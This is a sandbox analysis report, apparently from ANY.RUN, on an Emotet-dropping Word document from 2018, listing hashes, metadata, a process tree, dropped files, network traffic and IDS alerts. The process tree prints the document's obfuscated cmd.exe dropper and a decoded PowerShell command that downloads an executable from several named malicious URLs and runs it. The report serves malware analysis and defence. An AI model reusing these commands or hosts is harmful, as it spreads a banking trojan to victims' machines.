File name: | I3823266_12052018.doc |
Full analysis: | https://app.any.run/tasks/bc111018-b0bb-43ea-ae90-92e21ad3e005 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 03:34:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 14:33:00 2018, Last Saved Time/Date: Wed Dec 5 14:33:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 17, Security: 0 |
MD5: | DA6DBF31AB4002CA4555C5E3018F77A5 |
SHA1: | ACE28D6FF100D30DE5ECD87D9CDEF035D08F145A |
SHA256: | FFACF1DFA289DD087132DEE8C5BD49B9EC5EC3E561FE162F094301A3E95F9760 |
SSDEEP: | 1536:Vwt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9uD5C5kVH0PdG:M8GhDS0o9zTGOZD6EbzCd9mWFG |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 18 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 17 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:12:05 14:33:00 |
CreateDate: | 2018:12:05 14:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2936 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\I3823266_12052018.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3860 | c:\ZvZIAvmzCjBEfb\jzcdOqjj\DwmMQqivItVPXC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2412 | CmD /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4000 | C:\Windows\system32\cmd.exe /S /D /c" echo $RrO='kHi';$qNq=new-object Net.WebClient;$CSZ='http://iptvreseller.com/ZxwE@http://13.127.126.242/cCYYY@http://13.228.100.132/hFKNNaDM@http://ericleventhal.com/vOu@http://www.sdveganecofriendly.com/FB'.Split('@');$nDM='Tnz';$hic = '674';$nup='rfm';$Mqi=$env:temp+'\'+$hic+'.exe';foreach($ksd in $CSZ){try{$qNq.DownloadFile($ksd, $Mqi);$hRi='VLz';If ((Get-Item $Mqi).length -ge 80000) {Invoke-Item $Mqi;$zMz='iau';break;}}catch{}}$dMj='BAZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4076 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^|find "Cons"') DO %C -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2240 | C:\Windows\system32\cmd.exe /c ftype|find "Cons" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2732 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2824 | find "Cons" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3568 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3232 | "C:\Users\admin\AppData\Local\Temp\674.exe" | C:\Users\admin\AppData\Local\Temp\674.exe | — | powershell.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR69D6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3568 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HOZIXNUNE8ZK6WOG5MVK.temp | — | |
MD5:— | SHA256:— | |||
3568 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247cd2.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2936 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8C708748261A5349654AC274D6830F5B | SHA256:4696CB1D5C82CF03890F7F704C9C87FD780750AC148826471202CCC9162B6D1A | |||
2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$823266_12052018.doc | pgc | |
MD5:F57CADEFADD613907689CF6275D11C02 | SHA256:72F53FC6CF7C3457495A56BFFB776F5BAFA5D67ADF357E0B8D1248C11CD1EC72 | |||
3568 | powershell.exe | C:\Users\admin\AppData\Local\Temp\674.exe | executable | |
MD5:8118F4F594DAE97A595FBF6B46859A49 | SHA256:27E1FD100E541D069E2A289D7EC5212DC95E0DB32AB693ABD766A34ACB65968F | |||
3568 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2472 | 674.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:8118F4F594DAE97A595FBF6B46859A49 | SHA256:27E1FD100E541D069E2A289D7EC5212DC95E0DB32AB693ABD766A34ACB65968F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3568 | powershell.exe | GET | 200 | 64.15.74.206:80 | http://iptvreseller.com/ZxwE/ | CA | executable | 524 Kb | malicious |
3568 | powershell.exe | GET | 301 | 64.15.74.206:80 | http://iptvreseller.com/ZxwE | CA | html | 237 b | malicious |
1036 | archivesymbol.exe | GET | 200 | 114.55.106.210:443 | http://114.55.106.210:443/ | CN | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3568 | powershell.exe | 64.15.74.206:80 | iptvreseller.com | Netelligent Hosting Services Inc. | CA | suspicious |
1036 | archivesymbol.exe | 114.55.106.210:443 | — | Hangzhou Alibaba Advertising Co.,Ltd. | CN | malicious |
Domain | IP | Reputation |
---|---|---|
iptvreseller.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3568 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3568 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3568 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3568 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3568 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1036 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
1036 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |